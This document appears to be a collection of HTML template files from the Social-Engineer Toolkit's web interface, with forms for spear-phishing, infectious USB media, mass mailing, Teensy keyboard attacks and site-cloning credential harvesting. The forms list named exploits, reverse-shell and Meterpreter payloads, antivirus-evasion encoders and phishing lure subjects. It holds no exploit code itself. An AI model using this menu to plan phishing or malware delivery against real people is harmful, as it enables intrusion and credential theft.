<link rel="pingback" href="http://www.secmaniac.com/xmlrpc.php">
<link rel="alternate" type="application/rss+xml" title="SecManiac.com » Feed" href="http://www.secmaniac.com/feed/">
<link rel="alternate" type="application/rss+xml" title="SecManiac.com » Comments Feed" href="http://www.secmaniac.com/comments/feed/">
<script src="files/ga.js" async="" type="text/javascript"></script><script type="text/javascript" src="files/jquery.js"></script>
<script type="text/javascript" src="files/external-tracking.js"></script>
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.secmaniac.com/xmlrpc.php?rsd">
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.secmaniac.com/wp-includes/wlwmanifest.xml">
<link rel="index" title="SecManiac.com" href="http://www.secmaniac.com/">
</head><body>
<div id="header">
<div id="socialmedia2">
<a style="" href="http://www.secmaniac.com/feed/"><img src="files/rss.png" alt="RSS Feed" title="RSS Feed"></a><br><br>
<a style="" href="http://twitter.com/dave_rel1k"><img src="files/tweet.png" alt="Twitter" title="Follow Me On Twitter!"></a>
</div>
<div id="logo">
<a href="./"><img src="files/logo.png" alt="SecManiac.com"></a>
</div>
<div id="nav">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="./"><img class="nav-button" src="files/main.png" alt="MAIN"></a><a href="/updates"><img class="nav-button" src="files/updates.png" alt="updates"></a>
</div>
</div>
<br>
<div id="content">
<h1><a href="http://www.secmaniac.com/">The Social-Engineer Toolkit (SET) Web Interface</a></h1>
<br><br>
<style type="text/css">
option {
color: white;
background-color: black;
}
</style>
<FONT FACE="sans serif" size="3">

116
src/commandcenter/infect.site Normal file
View file

@ -0,0 +1,116 @@
<div class="post">
<h4 class="dates">Social-Engineer Toolkit (SET) Infectious Media Attack Vector</h4>
<div class="entry">
<h2>Infectious Media Generator</h2>
Welcome to the Social-Engineer Toolkit web interface, be sure to only select what is applicable to your attack.<br><br>The Infectious USB/CD/DVD method will create an autorun.inf file and a Metasploit payload. When the DVD/USB/CD is inserted, it will automatically run if autorun is enabled.<br><br>
<br><p><b>Infectious Media Generator</b></p>
<form action="/infect_post" method="POST">
<style type="text/css">
option {
color: white;
background-color: black;
}
</style>
<FONT FACE="sans serif" size="3">
<select name="attack" STYLE="font-family : arial; font-size : 7pt">
<option value="1">File-Format Exploits</option>
<option value="2">Standard Metasploit Executables</option>
</select>
<br><br>
Enter the IP address for the reverse connection (payload): <input type="text" name="externalip" size="10" STYLE="font-family : arial; font-size : 7pt" /><br />
<br><p><b>File-Format Exploits (Only)</b><p>
<select name="phish_attack" STYLE="font-family : arial; font-size : 7pt">
<option value="1">SET Custom Written DLL Hijacking</option>
<option value="2">SET Custom Written Document UNC LM SMB Capture Attack</option>
<option value="3">Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow</option>
<option value="4">Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)</option>
<option value="5">Adobe Flash Player 'Button' Remote Code Execution</option>
<option value="6">Adobe CoolType SING Table 'uniqueName'</option>
<option value="7">Adobe Flash Player 'newfunction'</option>
<option value="8">Adobe Collab.collectEmailInfo</option>
<option value="9">Adobe Collab.getIcon Overflow</option>
<option value="10">Adobe JBIG2Decode Memory Corruption</option>
<option value="11">Adobe PDF Embedded EXE SE</option>
<option value="12">Adobe util.printf() Buffer Overflow</option>
<option value="13">Custom EXE to VBA (sent via RAR)</option>
<option value="14">Adobe U3D CLODProgressiveMeshDeclration</option>
<option value="15">Adobe PDF Embedded EXE SE (NOJS)</option>
<option value="16">Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow</option>
<option value="17">Nuance PDF Reader v6.0 Launch Stack Buffer Overflow</option>
<optionv alue="18">Adobe Reader u3D Memory Corruption Vulnerability</option>
</select>
<br><br>
<p><b>Payload Selection Options (Metasploit Executable and File Format Exploits)</b></p>
<select name="payload_selection" STYLE="font-family : arial; font-size : 7pt">
<option value"1">Windows Shell Reverse TCP</option>
<option value"2" selected="selected">Windows Reverse TCP Meterpreter</option>
<option value"3">Windows Reverse TCP VNC DLL</option>
<option value"4">Windows Bind Shell</option>
<option value"5">Windows Bind Shell X64</option>
<option value"6">Windows Shell Reverse TCP X64</option>
<option value"7">Windows Meterpreter Reverse TCP X64</option>
<option value"8">Windows Meterpreter Egress Buster</option>
<option value"9">Windows Meterpreter Reverse HTTPS</option>
<option value"10">Windows Meterpreter Reverse DNS</option>
</select>
<br>
<br>Import your own: <input type="file" name="payload_selection_filename" size="5" STYLE="font-family : arial; font-size : 7pt">
<br><br>
<p><b>Encoding Options</b></p>
<select name="encoding" STYLE="font-family : arial; font-size : 7pt">
<option value"1">avoid_utf8_tolower</option>
<option value"2">shikata_ga_nai</option>
<option value"3">alpha_mixed</option>
<option value"4">alpha_upper</option>
<option value"5">call4_dword_xor</option>
<option value"6">countdown</option>
<option value"7">fnstenv_mov</option>
<option value"8">jmp_call_additive</option>
<option value"9">nonalpha</option>
<option value"10">nonupper</option>
<option value"11">unicode_mixed</option>
<option value"12">unicode_upper</option>
<option value"13">alpha2</option>
<option value"14">No Encoding</option>
<option value"15">Multi-Encoder</option>
<option value"16" selected="selected">Backdoored Executable</option>
</select>
<br><br>
<p><b>Default Port for Listener</b></p>
Enter the default port: <input type="text" name="port" size="7" value="443" STYLE="font-family : arial; font-size : 7pt"/>
<br><br>
<p><b>For the Custom SET DLL Hijacking Attack Vector, select application to attack</b></p>
<br>
<select name="dll_hijack" STYLE="font-family : arial; font-size : 7pt">
<option value"1">Windows Address Book (Universal)</option>
<option value"2">Microsoft Help and Support Center</option>
<option value"3">Wscript (XP)</option>
<option value"4">Microsoft Office PowerPoint 2007</option>
<option value"5">Microsoft Group Converter</option>
<option value"6">Safari v5.0.1</option>
<option value"7">FireFox <= 3.6.8</option>
<option value"8">Microsoft PowerPoint 2010</option>
<option value"9">Microsoft PowerPoint 2007</option>
<option value"10">Microsoft Visio 2010</option>
<option value"11">Microsoft Word 2007</option>
<option value"12">Microsoft PowerPoint 2007</option>
<option value"13">Microsoft Windows Media Encoder 9</option>
<option value"14">Windows 7 and Vista Backup Utility</option>
<option value"15">Encase</option>
<option value"16">IBM Rational License Key Administrator</option>
<option value"17">Microsoft RDP</option>
</select>
<br>
<br>
<CHECKHERE>
<input type="submit" value="Launch Attack" STYLE="font-family : arial; font-size : 7pt">
</form>
</div>
</div>
<br><br>
</div>

27
src/commandcenter/main.site Normal file
View file

@ -0,0 +1,27 @@
<div class="post">
<h4 class="dates">The Social-Engineer Toolkit (SET) HomePage</h4>
<div class="entry">
<h2>SET Web Interface</h2>
<center><br>
<img src="./files/setman.jpg" alt="the social-engineer toolkit logo" />
</center><br>
<p>
The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET has quickly become a standard tool in a penetration testers arsenal. Use SET for Good, not Evil :-( SET was written by David Kennedy (ReL1K) and with a lot of help from the community it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test. <br><br>Welcome to the Social-Engineer Toolkit (SET) Web Interface. This is a work in progress and first release of the toolkit, please report any bugs to davek@secmaniac.com. There are already a few improvements that will be made after the release (in the short term). I would like to add the ability to eliminate certain choices based off your selection. For example if you were to select Java Applet attack vector, it would remove the options for the multi-attack. Again, this is the second release and a work in progress at that, if you find any bugs let me know!
<br>
<br>
<center><b>Select the attack vector you want:</b>
<br><br>
<a href="/social_engineering">Social-Engineering Attacks</a><br><br>
<a href="/fasttrack">Fast-Track Penetration Testing</a><br>
</center>
<br><br>
Select the attack vector that you want to perform. The Social-Engineering attacks are more geared towards what SET was originally designed to attack, the human element. The second attack vectors is from the popular Fast-Track tool that is now incorporated into SET. These attack vectors are primarily targetted at direct attacks and exploits and allows for a penetration testing framework.
</p>
</div>
</div>
<br><br>
</div>

26
src/commandcenter/mass_mailer.site Normal file
View file

@ -0,0 +1,26 @@
<div class="post">
<h4 class="dates">Social-Engineer Toolkit (SET) Mass Mailer</h4>
<div class="entry">
<h2>Mass Mailer Options</h2>
Welcome to the Social-Engineer Toolkit web interface, be sure to only select what is applicable to your attack.<br><br>
<br><p><b>Spear-Phishing Attack Methods</b></p>
<form action="/mass_mailer_post" method="POST">
<style type="text/css">
option {
color: white;
background-color: black;
}
</style>
<FONT FACE="sans serif" size="3">
<CHECKHERE>
<br><br>
<input type="submit" value="Launch Attack" STYLE="font-family : arial; font-size : 7pt">
</form>
</div>
</div>
<br><br>
</div>

33
src/commandcenter/phish.moo Normal file
View file

@ -0,0 +1,33 @@
<br><br>
<p><b>Web Attack Email Options through SET Config is turned to ON</b><p>
<input type="checkbox" name="webattack_email" value="1"> E-Mail Attack Single Email Address<br>
<input type="checkbox" name="webattack_email" value="2"> E-Mail Attack Mass Mailer<br>
<br>
If your using mass emailer, browser to file with email addresses: <input type="file" name="massmailer_file" size="5">
<br>
<br>
Enter who you want to send the email to: <input type="text" name="emailto" /><br />
<br><br>
<input type="checkbox" name="webattack_account" value="1"> Use a GMAIL account for your email attack<br>
<input type="checkbox" name="webattack_account" value="2"> Use your own open-relay SMTP Server<br>
<br><br>
<p><b>THIS OPTION FOR OPEN-RELAY ONLY</b></p>
<br>
Enter your email address you want to come from: <input type="text" name="emailfrom_relay" /><br />
Enter your username for open relay (leave blank if there is none): <input type="text" name="username_relay" /><br />
Enter your password for open relay (leave blank if there is none): <input type="password" name="password_relay" /><br />
Enter the SMTP Server address for the open relay: <input type="text" name="smtp_relay" /><br/>
Enter the port number for the SMTP server: <input type="text" name="smtp_port_relay" value="25" size="3" /><br/>
<br><br>
<p><b>THIS OPTION FOR GMAIL ATTACK ONLY!</b></p><br>
Enter your email address: <input type="text" name="emailfrom" /><br />
Enter your password for the email address: <input type="password" name="password" /><br />
<br><br>
<p><b>Required fields below</b></p>
Enter the subject for the email: <input type="text" name="subject" /><br />
<br><br>
<input type="checkbox" name="webattack_message" value="1"> Use HTML for the email attack<br>
<input type="checkbox" name="webattack_message" value="2"> Use Plain text for the email attack<br>
<br><br>
Enter your email message here<br><TEXTAREA NAME="comments" COLS=40 ROWS=6></TEXTAREA>
<br>

174
src/commandcenter/phish.site Normal file
View file

@ -0,0 +1,174 @@
<div class="post">
<h4 class="dates">Social-Engineer Toolkit (SET) Spear-Phishing Attack Vector</h4>
<div class="entry">
<h2>Spear-Phishing Attack Vector Options</h2>
Welcome to the Social-Engineer Toolkit web interface, be sure to only select what is applicable to your attack. For example for Credential Harvester you would only select the attack method and which site to clone.<br><br>
<br><p><b>Spear-Phishing Attack Methods</b></p>
<form action="/phish_post" method="POST">
<style type="text/css">
option {
color: white;
background-color: black;
}
</style>
<FONT FACE="sans serif" size="3">
<select name="attack" STYLE="font-family : arial; font-size : 7pt">
<option value="1">Perform a Mass Mail Email Attack</option>
</select>
<br><br>
<p><b>Client-Side Attack Vector (Mass Email Attack and File Format Payload ONLY)</b><p>
<select name="phish_attack" STYLE="font-family : arial; font-size : 7pt">
<option value="1">SET Custom Written DLL Hijacking</option>
<option value="2">SET Custom Written Document UNC LM SMB Capture Attack</option>
<option value="3">Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow</option>
<option value="4">Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)</option>
<option value="5">Adobe Flash Player 'Button' Remote Code Execution</option>
<option value="6">Adobe CoolType SING Table 'uniqueName'</option>
<option value="7">Adobe Flash Player 'newfunction'</option>
<option value="8">Adobe Collab.collectEmailInfo</option>
<option value="9">Adobe Collab.getIcon Overflow</option>
<option value="10">Adobe JBIG2Decode Memory Corruption</option>
<option value="11">Adobe PDF Embedded EXE SE</option>
<option value="12">Adobe util.printf() Buffer Overflow</option>
<option value="13">Custom EXE to VBA (sent via RAR)</option>
<option value="14">Adobe U3D CLODProgressiveMeshDeclration</option>
<option value="15">Adobe PDF Embedded EXE SE (NOJS)</option>
<option value="16">Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow</option>
<option value="17">Apple QuickTime PICT PnSize Buffer Overflow</option>
<option value="18">Nuance PDF Reader v6.0 Launch Stack Buffer Overflow</option>
<option value="19">Adobe Reader u3D Memory Corruption Vulnerability</option>
<optionv alue="20">MSCOMCTL ActiveX Buffer Overflow (ms12-027)</option>
</select>
<br><br>
<p><b>Payload Selection Options</b></p>
<select name="payload_selection" STYLE="font-family : arial; font-size : 7pt">
<option value"1">Windows Shell Reverse TCP</option>
<option value"2" selected="selected">Windows Reverse TCP Meterpreter</option>
<option value"3">Windows Reverse TCP VNC DLL</option>
<option value"4">Windows Bind Shell</option>
<option value"5">Windows Bind Shell X64</option>
<option value"6">Windows Shell Reverse TCP X64</option>
<option value"7">Windows Meterpreter Reverse TCP X64</option>
<option value"8">Windows Meterpreter Egress Buster</option>
<option value"9">Windows Meterpreter Reverse HTTPS</option>
<option value"10">Windows Meterpreter Reverse DNS</option>
</select>
<br>
<br>Import your own: <input type="file" name="payload_selection_filename" size="5" STYLE="font-family : arial; font-size : 7pt">
<br><br>
<p><b>Encoding Options</b></p>
<select name="encoding" STYLE="font-family : arial; font-size : 7pt">
<option value"1">avoid_utf8_tolower</option>
<option value"2">shikata_ga_nai</option>
<option value"3">alpha_mixed</option>
<option value"4">alpha_upper</option>
<option value"5">call4_dword_xor</option>
<option value"6">countdown</option>
<option value"7">fnstenv_mov</option>
<option value"8">jmp_call_additive</option>
<option value"9">nonalpha</option>
<option value"10">nonupper</option>
<option value"11">unicode_mixed</option>
<option value"12">unicode_upper</option>
<option value"13">alpha2</option>
<option value"14">No Encoding</option>
<option value"15">Multi-Encoder</option>
<option value"16" selected="selected">Backdoored Executable</option>
</select>
<br><br>
<p><b>Default Port for Listener</b></p>
Enter the default port: <input type="text" name="port" size="7" value="443" STYLE="font-family : arial; font-size : 7pt"/>
<br><br>
<p><b>For the Custom SET DLL Hijacking Attack Vector, select application to attack</b></p>
<br>
<select name="dll_hijack" STYLE="font-family : arial; font-size : 7pt">
<option value"1">Windows Address Book (Universal)</option>
<option value"2">Microsoft Help and Support Center</option>
<option value"3">Wscript (XP)</option>
<option value"4">Microsoft Office PowerPoint 2007</option>
<option value"5">Microsoft Group Converter</option>
<option value"6">Safari v5.0.1</option>
<option value"7">FireFox <= 3.6.8</option>
<option value"8">Microsoft PowerPoint 2010</option>
<option value"9">Microsoft PowerPoint 2007</option>
<option value"10">Microsoft Visio 2010</option>
<option value"11">Microsoft Word 2007</option>
<option value"12">Microsoft PowerPoint 2007</option>
<option value"13">Microsoft Windows Media Encoder 9</option>
<option value"14">Windows 7 and Vista Backup Utility</option>
<option value"15">Encase</option>
<option value"16">IBM Rational License Key Administrator</option>
<option value"17">Microsoft RDP</option>
</select>
<br>
<br>
<b>NOTE IF YOU SELECTED A PDF EXPLOIT TO CHANGE THE VALUE TO template.pdf</b>
<br>
Name of attachment to send <input type="text" name="attachment" size="10" value="template.rar" STYLE="font-family : arial; font-size : 7pt"/>
<br>
<br>
<p><b>Specify if your using mass mailer or single email targets</b></p>
<input type="checkbox" name="webattack_email" value="1" STYLE="font-family : arial; font-size : 7pt" CHECKED> E-Mail Attack Single Email Address<br>
<input type="checkbox" name="webattack_email" value="2" STYLE="font-family : arial; font-size : 7pt" > E-Mail Attack Mass Mailer<br>
<br>
<br>
<input type="checkbox" name="predefined" value="1" STYLE="font-family : arial; font-size : 7pt">Predefined template<br>
<select name="template" STYLE="font-family : arial; font-size : 7pt">
<option value="1"> New Update</option>
<option value="2"> Computer Issue</option>
<option value="3"> Strange internet usage</option>
<option value="4"> LOL..have to check this out...</option>
<option value="5"> Status Report</option>
<option value="6"> Pay Raise Application Form</option>
<option value="7"> WOAAAA!!!!!! This is crazy...</option>
<option value="8"> Basketball Tickets</option>
<option value="9"> Baby Pics</option>
<option value="10"> Have you seen this?</option>
<option value="11"> Termination List</option>
<option value="12"> How long has it been?</option>
<option value="13"> Dan Brown's Angels & Demons</option>
</select>
<br><br>
<input type="checkbox" name="predefined" value="2" STYLE="font-family : arial; font-size : 7pt">Use a one time template<br>
Enter your email message here<br><TEXTAREA NAME="message" COLS=100 ROWS=15 STYLE="font-family : arial; font-size : 7pt"></TEXTAREA>
<br><br>
If your using mass emailer, browse to file with email addresses: <input type="file" name="massmailer_file" size="5">
<br>
<br>
Enter who you want to send the email to: <input type="text" name="emailto" STYLE="font-family : arial; font-size : 7pt" /><br />
<br><br>
<input type="checkbox" name="webattack_account" value="1"STYLE="font-family : arial; font-size : 7pt" CHECKED> Use a GMAIL to send the email out<br>
<input type="checkbox" name="webattack_account" value="2" STYLE="font-family : arial; font-size : 7pt" > Use your own open-relay SMTP Server<br>
<br><br>
<p><b>THIS OPTION FOR OPEN-RELAY ONLY</b></p>
<br>
Enter your email address you want to come from: <input type="text" name="emailfrom_relay" STYLE="font-family : arial; font-size : 7pt"/><br />
Enter your username for open relay (leave blank if there is none): <input type="text" name="username_relay" STYLE="font-family : arial; font-size : 7pt"/><br />
Enter your password for open relay (leave blank if there is none): <input type="password" name="password_relay" STYLE="font-family : arial; font-size : 7pt" /><br />
Enter the SMTP Server address for the open relay: <input type="text" name="smtp_relay" STYLE="font-family : arial; font-size : 7pt" /><br/>
Enter the port number for the SMTP server: <input type="text" name="smtp_port_relay" value="25" size="3" STYLE="font-family : arial; font-size : 7pt" /><br/>
<br><br>
<p><b>THIS OPTION FOR GMAIL ATTACK ONLY!</b></p><br>
Enter your email address: <input type="text" name="emailfrom" STYLE="font-family : arial; font-size : 7pt"/><br />
Enter your password for the email address: <input type="password" name="password" STYLE="font-family : arial; font-size : 7pt"/><br />
<br><br>
<p><b>Required fields below for custom template</b></p>
Enter the subject for the email: <input type="text" name="subject" STYLE="font-family : arial; font-size : 7pt"/><br />
<br><br>
<CHECKHERE>
<input type="submit" value="Launch Attack" STYLE="font-family : arial; font-size : 7pt">
</form>
</div>
</div>
<br><br>
</div>

11
src/commandcenter/post.site Normal file
View file

@ -0,0 +1,11 @@
<div class="post">
<h4 class="dates">Social-Engineer Toolkit (SET) Action has completed.</h4>
<div class="entry">
<h2>Social-Engineer Toolkit (SET)</h2>
<p>Your action has been submitted through SET, check your console session for more information.</p>
</div>
</div>
<br><br>
</div>

16
src/commandcenter/self_signed.site Normal file
View file

@ -0,0 +1,16 @@
<br><br>
<p><b>Self-Signed Applet is turned to ON, enter information for the java certificate (java applet and multi-attack ONLY)</b><p>
<br>
What is your First and Last Name: <input type="text" name="firstname" size="10" /><br />
<br>
What is the name of your organization unit: <input type="text" name="orgunit" size="10" /><br />
<br>
What is the name of your organization: <input type="text" name="orgname" size="10" /><br />
<br>
What is the name of your city or locality: <input type="text" name="city" size="10" /><br />
<br>
What is the name of your state or province: <input type="text" name="state" size="10" /><br />
<br>
What is the two letter code for your country ex. US: <input type="text" name="country" size="2" /><br />
<br>

25
src/commandcenter/social_engineering.site Normal file
View file

@ -0,0 +1,25 @@
<div class="post">
<h4 class="dates">The Social-Engineer Toolkit (SET) SE Attacks</h4>
<div class="entry">
<h2>SET - Social-Engineering Attacks - Web Interface</h2>
<p>
Welcome to the Social-Engineer Toolkit - Social-Engineering attack vectors. These will list all of the attack vectors available through the SET interface.
<br>
<br><b>Select the attack vector you want:</b>
<br><br>
<a href="/phish">Spear-Phishing Attack Vector</a><br><br>
<a href="/web_attack">Website Attack Vector</a><br><br>
<a href="/infect">Infectious Media Generator</a><br><br>
<a href="/mass_mailer">Mass Mailer Attack</a><br><br>
<a href="/teensy">Arduino-Based Attack Vector</a><br><br>
<a href="/wireless">Wireless Access Point Attack Vector</a><br><br>
Select the attack vector that you want to perform.
</p>
</div>
</div>
<br><br>
</div>

105
src/commandcenter/teensy.site Normal file
View file

@ -0,0 +1,105 @@
<div class="post">
<h4 class="dates">Social-Engineer Toolkit (SET) Teensy Vector</h4>
<div class="entry">
<h2>Teensy Attack Vector Options</h2>
Welcome to the Social-Engineer Toolkit web interface, be sure to only select what is applicable to your attack. For example for Credential Harvester you would only select the attack method and which site to clone.<br><br>
Special thanks to: IronGeek, WinFang, and Garland
<br><br>
The Teensy HID Attack Vector utilizes the teensy USB device to
program the device to act as a keyboard. Teensy's have onboard
storage and can allow for remote code execution on the physical
system. Since the devices are registered as USB Keyboard's it
will bypass any autorun disabled or endpoint protection on the
system.
<br><br>
You will need to purchase the Teensy USB device, it's roughly
$22 dollars. This attack vector will auto generate the code
needed in order to deploy the payload on the system for you.
<br><br>
This attack vector will create the .pde files necessary to import
into Arduino (the IDE used for programming the Teensy). The attack
vectors range from Powershell based downloaders, wscript attacks,
and other methods.
<br><br>
For more information on specifications and good tutorials visit:
<br><br>
http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle
<br><br>
To purchase a Teensy, visit: http://www.pjrc.com/store/teensy.html
<br>
<br><p><b>Teensy Attack Methods</b></p>
<form action="/teensy_post" method="POST">
<style type="text/css">
option {
color: white;
background-color: black;
}
</style>
<FONT FACE="sans serif" size="3">
<select name="attack" STYLE="font-family : arial; font-size : 7pt">
<option value="1">Powershell HTTP GET MSF Payload</option>
<option value="2">WSCRIPT HTTP GET MSF Payload</option>
<option value="3">Powershell based Reverse Shell</option>
<option value="4">IE Beef Jacking</option>
<option value="5">Malicious Java Accept</option>
<option value="6">Gnome wget Download Payload</option>
<option value="7">Binary 2 Teensy Attack (Deploy MSF payloads)</option>
<option value="8">SDCard 2 Teensy Attack (Deploy Any EXE)</option>
<option value="9">SDCard 2 Teensy Attack (Deploy on OSX)</option>
<option value="10">X10 Arduino Sniffer PDE and Libraries</option>
option value="11">X10 Arduino Jammer PDE and Libraries</option>
</select>
<br>
<br><p><b>Payload options:</b><p>
<select name="payload" STYLE="font-family : arial; font-size : 7pt">
<option value="1">Windows Shell Reverse TCP</option>
<option value="2" selected="selected">Windows Reverse TCP Meterpreter</option>
<option value="3">Windows Reverse TCP VNC DLL</option>
<option value="4">Windows Bind Shell</option>
<option value="5">Windows Bind Shell X64</option>
<option value="6">Windows Shell Reverse TCP X64</option>
<option value="7">Windows Meterpreter Reverse TCP X64</option>
<option value="8">Windows Meterpreter Egress Buster</option>
<option value="9">Windows Meterpreter Reverse HTTPS</option>
<option value="10">Windows Meterpreter Reverse DNS</option>
</select>
<br>
<br>Import your own: <input type="file" name="payload_selection" size="5" STYLE="font-family : arial; font-size : 7pt">
<br><br>
<p><b>Encoding Options</b></p>
<select name="encoding" STYLE="font-family : arial; font-size : 7pt">
<option value="1">avoid_utf8_tolower</option>
<option value="2">shikata_ga_nai</option>
<option value="3">alpha_mixed</option>
<option value="4">alpha_upper</option>
<option value="5">call4_dword_xor</option>
<option value="6">countdown</option>
<option value="7">fnstenv_mov</option>
<option value="8">jmp_call_additive</option>
<option value="9">nonalpha</option>
<option value="10">nonupper</option>
<option value="11">unicode_mixed</option>
<option value="12">unicode_upper</option>
<option value="13">alpha2</option>
<option value="14">No Encoding</option>
<option value="15">Multi-Encoder</option>
<option value="16" selected="selected">Backdoored Executable</option>
</select>
<br><br>
<p><b>Default Port for Listener</b></p>
Enter the default port: <input type="text" name="port" size="7" value="443" STYLE="font-family : arial; font-size : 7pt"/>
<br><br>
<CHECKHERE>
<br><br><input type="submit" value="Launch Attack" STYLE="font-family : arial; font-size : 7pt">
</form>
</div>
</div>
<br><br>
</div>

26
src/commandcenter/update.site Normal file
View file

@ -0,0 +1,26 @@
<div class="post">
<h4 class="dates">The Social-Engineer Toolkit (SET) Updates</h4>
<div class="entry">
<h2>Update Options</h2>
Welcome to the Social-Engineer Toolkit web interface, be sure to only select what is applicable to your attack.<br><br>
<br><p><b>Update Options</b></p>
<form action="/updates_post" method="POST">
<input type="checkbox" name="updates_main" value="1"> Update The Social-Engineer Toolkit (SET)<br>
<input type="checkbox" name="updates_main" value="2"> Update The Metasploit Framework<br>
<input type="checkbox" name="updates_main" value="3"> Update Everything<br>
<br><br><input type="submit" value="Perform Updates"></form>
<br><br>
<br><p><b>Configuration Editor</b></p>
This menu will allow you to dynamically edit the configuration file for the SET configuration.
<br><br>
<form action="/update_config_post" method="POST">
CONFIGEDITORHERE
<br>
<input type="submit" value="Update Configuration">
</form>
</div>
</div>
<br><br>
</div>

129
src/commandcenter/web_attack.site Normal file
View file

@ -0,0 +1,129 @@
<div class="post">
<h4 class="dates">Social-Engineer Toolkit (SET) Web-Attack Vector</h4>
<div class="entry">
<h2>Web-Attack Vector Options</h2>
Welcome to the Social-Engineer Toolkit web interface, be sure to only select what is applicable to your attack. For example for Credential Harvester you would only select the attack method and which site to clone. If you were using something different like the Java Applet Attack Vector you would select the attack, site to clone, payload, encoding, etc.<br><br>
<br><p><b>Web Attack Methods</b></p>
<form action="/web_attack_post" method="POST">
<select name="attack" STYLE="font-family : arial; font-size : 7pt">
<option value="1">Java Applet Attack Vector</option>
<option value="2">Metasploit Browser Exploit Method</option>
<option value="3">Credential Harvester Attack Method</option>
<option value="4">Tabnabbing Attack Method</option>
<option value="5">Man Left in the Middle Attack Method</option>
<option value="6">Web Jacking Attack Method</option>
<option value="7">Multi-Attack Web Method</option>
</select>
<br><br>
<p><b>Site Cloning Menu</b></p>
Site to clone: <input type="text" name="cloner" STYLE="font-family : arial; font-size : 7pt" /><br />
<br><br>
<p><b>Metasploit Browser Attack Exploit (Multi-Attack and Client-Side Attack ONLY) (select one)</b></p>
<select name="browser" STYLE="font-family : arial; font-size : 7pt">
<option value="1" selected="selected">Java AtomicReferenceArray Type Violation Vulnerability</option>
<option value="2">Java Applet Field Bytecode Verifier Cache Remote Code Execution</option>
<option value="3">MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption</option>
<option value="4">Microsoft XML Core Services MSXML Uninitialized Memory Corruption</option>
<option value="5">Adobe Flash Player Object Type Confusion</option>
<option value="6">Adobe Flash Player MP4 'cprt' Overflow</option>
<option value="7">MS12-004 midiOutPlayNextPolyEvent Heap Overflow</option>
<option value="8">Java Applet Rhino Script Engine Remote Code Execution</option>
<option value="9">MS11-050 IE mshtml!CObjectElement Use After Free</option>
<option value="10">Adobe Flash PLayer 10.2.143.1 SWF Memory Corruption Vulnerability</option>
<option value="11">Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute</option>
<option value="12">Internet Explorer CSS Import Use After Free</option>
<option value="13">Microsoft WMI Administration Tools ActiveX Buffer Overflow</option>
<option value="14">Internet Explorer CSS Tags Memory Corruption</option>
<optionv alue="15">Sun Java Applet2ClassLoader Remote Code Execution</option>
<option value="16">Sun Java Runtime New Plugin docbase Buffer Overflow</option>
<option value="17">Microsoft WebDav Application DLL Hijacker</option>
<option value="18">Adobe Flash Player AVM Bytecode Verification Vulnerability</option>
<option value="19">Adobe Shockwave rcsL Memory Corruption Exploit</option>
<option value="20">Adobe CoolType SING Table 'uniqueName'</option>
<option value="21">Apple QuickTime 7.6.7 Marshaled_pUnk</option>
<option value="22">Microsoft Help Center XSS (MS10-042)</option>
<option value="23">Microsoft Internet Explorer iepeers.dll (MS10-018)</option>
<option value="24">Microsoft Internet Explorer Tabular Data Control (MS10-018)</option>
<option value="25">Microsoft Internet Explorer "Aurora" Memory Corruption (MS10-002)</option>
<option value="26">Microsoft Internet Explorer 7 Uninitialized Mem Corruption (MS09-002)</option>
<option value="27">Microsoft Internet Explorer Style getElementsbyTagName (MS09-072)</option>
<option value="28">Microsoft Internet Explorer isComponentInstalled Overflow</option>
<option value="29">Microsoft Internet Explorer Data Binding (MS08-078)</option>
<option value="30">Mcirosoft Internet Explorer Unsane Scripting Misconfiguration</option>
<option value="31">FireFox 3.5 escape Return Value Memory Corruption</option>
<option value="32">FireFox 3.6.16 mChannel use after free vulnerability</option>
<option value="33">Metasploit Browser Autopwn (USE AT OWN RISK!)</option>
</select>
<br>
<br><p><b>Payload options (only for Java Applet, Metasploit Browser, and Multi-Attack) (select one)</b><p>
<select name="payload_selection" STYLE="font-family : arial; font-size : 7pt">
<option value="1">Windows Shell Reverse TCP</option>
<option value="2" selected="selected">Windows Reverse TCP Meterpreter</option>
<option value="3">Windows Reverse TCP VNC DLL</option>
<option value="4">Windows Bind Shell</option>
<option value="5">Windows Bind Shell X64</option>
<option value="6">Windows Shell Reverse TCP X64</option>
<option value="7">Windows Meterpreter Reverse TCP X64</option>
<option value="8">Windows Meterpreter Egress Buster</option>
<option value="9">Windows Meterpreter Reverse HTTPS</option>
<option value="10">Windows Meterpreter Reverse DNS</option>
<option value="11">SE Toolkit Interactive Command Shell (Java Applet Only)</option>
<option value="12">SE Toolkit HTTP Reverse Shell</option>
<option value="13">RATTE HTTP Tunneling Payload (Java Applet Only)</option>
<option value="14">ShellCodeExec Alphanum Shellcode </option>
</select>
<br>
<br>Import your own: <input type="file" name="payload_selection_filename" size="5" STYLE="font-family : arial; font-size : 7pt">
<br><br>
<p><b>Encoding Options</b></p>
<select name="encoding" STYLE="font-family : arial; font-size : 7pt">
<option value="1">avoid_utf8_tolower</option>
<option value="2">shikata_ga_nai</option>
<option value="3">alpha_mixed</option>
<option value="4">alpha_upper</option>
<option value="5">call4_dword_xor</option>
<option value="6">countdown</option>
<option value="7">fnstenv_mov</option>
<option value="8">jmp_call_additive</option>
